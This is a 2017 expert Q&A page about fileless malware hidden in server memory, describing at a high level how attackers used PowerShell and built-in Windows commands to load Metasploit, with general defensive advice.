Q
Evaluate Weigh the pros and cons of technologies, products and projects you are considering.

What tools were used to hide fileless malware in server memory?

Fileless malware hidden in server memory led to attacks on many companies worldwide. Expert Nick Lewis explains how these attacks fit in with the wider fileless malware trend.

More than 140 banks, government organizations and telecommunications companies worldwide have been attacked with...

"fileless malware" hidden in server memory. What tools and techniques were used to carry out these attacks? Are these similar to the fileless malware attacks you wrote about last year?

One of the key aspects of any attack is to get the target system to take certain actions or get access to data by executing code on the target system. One of the earliest attack methods to gain widespread attention in the information security community was remote code execution via a vulnerability in a service or process running as an administrative user. This would provide the initial access to a system so the next step in the attack could be taken, like installing a rootkit.

As enterprises began implementing security controls like firewalls and server software started getting more resistant to remote code execution vulnerabilities, attackers have adapted to continue to get access to systems and data. Many of the remote code execution exploits would rely on built-in executables in known locations to execute code on the target system. This is remarkably similar to how fileless attacks have developed, and the use of phishing has replaced remote code execution for many attacks. There, however, continue to be attacks using remote code execution.

An attack would not be able to be carried out without the ability to execute code on the endpoint, with the exception of physical attacks. Even ransomware requires executing malicious code on the endpoint. The strict definition of fileless malware has changed over time and, as I wrote last year, there has been a rise in fileless malware. Lenny Zeltser, vice president of products at Minerva Labs and senior instructor at the SANS Institute, wrote about the history of fileless malware attacks, addressing the rise in using this terminology and the fact that it is used to refer to various attack methods.

The attack Kaspersky Lab's Global Research and Analysis Team wrote about uses PowerShell and built-in Windows commands to download Metasploit and take control of the endpoint. The attack relies on insecure configurations of PowerShell that enable the endpoint to execute any PowerShell commands and store data in the registry; and it takes advantage of vulnerabilities on the endpoint, much like other fileless malware attacks. Enterprises should periodically check their servers' memory for any irregularities that may indicate a fileless malware attack.

Next Steps

Find out how your enterprise can stop malware-free attacks on its networks

Learn how to train employees in identifying social engineering email attacks

Defend your enterprise against the scriptless Linux exploit

This was last published in July 2017

Dig Deeper on Malware, virus, Trojan and spyware protection and removal

PRO+

Content

Find more PRO+ content and other member only offers, here.

Have a question for an expert?

Please add a title for your question

Get answers from a TechTarget expert on whatever's puzzling you.

You will be able to add details on the next page.

Join the conversation

1 comment

Send me notifications when other members comment.

By submitting you agree to receive email from TechTarget and its partners. If you reside outside of the United States, you consent to having your personal data transferred to and processed in the United States. Privacy

Please create a username to comment.

How does your enterprise categorize and prevent fileless malware?
Cancel

-ADS BY GOOGLE

SearchCloudSecurity

SearchNetworking

SearchCIO

SearchEnterpriseDesktop

SearchCloudComputing

ComputerWeekly

Close